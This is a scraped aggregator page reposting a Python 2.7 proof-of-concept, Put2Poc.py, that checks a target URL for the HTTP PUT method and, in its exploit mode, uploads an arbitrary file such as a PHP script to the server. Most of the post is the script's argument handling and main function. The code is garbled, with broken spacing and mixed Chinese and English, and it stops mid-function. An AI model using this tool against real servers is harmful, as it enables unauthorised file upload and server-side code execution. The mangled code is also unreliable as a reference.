Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

PUT upload POC--Put2Poc.py

2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Environment Python 2.7 requests sysWindows 7Apache has completed put configuration. PHP

Apache PUT configuration

A brief introduction to the source code to increase readability. POC entry function, set the default variable, accept and judge whether the user input parameters are legal, call the unsafe HTTP method function Test2Option (url,YN), accept the supported methods, and call the PUT method to upload files. Def main (): if len (sys.argv)

< 2 : print u''' Version:1.0 请输入将要验证的URL(eg:Put2Poc.py http://test.com) Put2Poc.py arg1 arg2 arg1:目标URL arg2: 选择(1)验证OR(2)利用(默认为验证) arg3: 选择上传文件的目录,默认为/(eg:/test/) arg4: 设置长传的文件的文件名,默认为test.html arg5:设置特定的利用payload(默认漏洞利用为:) 注:当前版本仅支持PHP语言的利用''' sys.exit() if len(sys.argv) >

= 2: url = sys.argv [1] YN = 1 path ='/ 'filename =' test.html' content = None # print url if 'http' not in url: print u' Please enter HTTP/HTTPS (eg:Put2Poc.py http://test.com)' sys.exit () if len (sys.argv)) > = 3: # print type (sys.argv [2]) if sys.argv [2] in'2': filename = 'test.php' if sys.argv [2] not in [' 1' The setting entered in'2']: print u' is incorrect Please select the correct setting (1: verify | 2: utilize) 'sys.exit () YN = sys.argv [2] if len (sys.argv) > = 4: path = sys.argv [3] if len (sys.argv) > = 5: filename = sys.argv [4] if len (sys.argv) > = 6: Content = sys.argv [5] if len (sys.argv) > 6: print u 'Please check the parameter settings' sys.exit () r_options = Test2Option (url) YN) if content is not None: Put2File (url,YN,r_options,path,filename,content) else: Put2File (url,YN,r_options,path,filename) # print r_optionsError2status (code) determines the return status of the request. Parameter code: status code returned by the request def Error2status (code): if 400

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report